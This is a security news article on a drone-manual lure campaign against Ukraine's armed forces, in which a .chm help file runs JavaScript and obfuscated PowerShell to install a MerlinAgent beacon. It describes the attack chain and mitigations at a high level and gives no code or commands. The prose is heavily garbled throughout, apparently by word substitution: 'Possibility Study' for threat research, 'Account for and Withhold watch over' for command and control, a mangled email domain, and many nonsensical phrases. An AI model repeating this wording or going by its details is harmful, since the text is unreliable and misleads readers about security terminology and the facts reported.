Hackers Lures Drone Manual to Deliver Notorious MerlinAgent malware

Securonix Possibility Study has chanced on a big assault known as STARK#VORTEX, which looks to be to close from a neighborhood is called UAC-0154.

This marketing campaign particularly targets Ukraine’s protection power, leveraging a crafty tactic spirited drone-linked lures.

Drones non-public played a pivotal characteristic in Ukraine’s protection power operations, making them an comely theme for malicious actors.

The attackers in the assist of UAC-0154 before the entire lot used protection power-themed paperwork sent by electronic mail to Ukrainian targets on @ukr.fetch.

Nonetheless, their ways non-public advanced, and they also’ve now became to turning in the MerlinAgent malware the expend of a contemporary diagram.

Here’s a Breakdown of the Assault Chain:

Entice File – The untrue file is disguised as a Microsoft Abet file, in most cases known as a .chm file. Namely, it modified into as soon as titled “Інфо про навчання по БПЛА для військових.v2.2.chm,” which translates to “data about UAV coaching for the protection power.”

When the particular person opens this file, it triggers a malicious JavaScript code embedded interior it.

Obfuscated PowerShell – The JavaScript code throughout the .chm file communicates with a a ways flung Account for and Withhold watch over (C2) server to download an obfuscated binary payload.

Payload Activation – This payload, as soon as decoded, becomes a beacon payload for the MerlinAgent malware, establishing dialog with the C2 server and granting fat adjust to the attackers.

The assault chain would possibly appear easy, however the possibility actors employed advanced ways and obfuscation the formulation to lead sure of detection at every stage.

Preliminary Code Execution – Microsoft Abet recordsdata, without reference to being an older layout, can silent be achieved on fashionable Home windows programs.

On this case, the .chm file launched the PowerShell job, bypassing antivirus and EDR detections.

Abet File and JavaScript Execution – These recordsdata acted as containers, and their contents were analyzed, revealing obfuscated JavaScript code that achieved one other obfuscated PowerShell script.

PowerShell Execution – The PowerShell code curious a pair of layers of obfuscation, alongside side Base64 encoding, GZIP compression, and personality substitutions. It downloaded the payload from a particular URL, deobfuscated it, and saved it domestically.

Binary File Prognosis – The downloaded binary, roughly 5MB in size, became out to be a 64-bit executable linked with the MerlinAgent framework, an originate-source repeat and adjust (C2) framework available on GitHub.

This framework affords various capabilities, alongside side encrypted C2 dialog, a ways flung repeat shells, module toughen, and extra.

C2 and Infrastructure – The attackers established encrypted dialog with C2 servers over port 443, making detection extra hard.

This highly centered assault marketing campaign centered on the Ukrainian protection power. The expend of recordsdata and paperwork that would effortlessly bypass defenses and the attackers’ artful framing underscores the necessity for vigilance.

Securonix recommends several mitigations, alongside side warding off downloading recordsdata from untrusted sources, monitoring specific directories for suspicious actions, and deploying enhanced logging solutions for improved detection protection.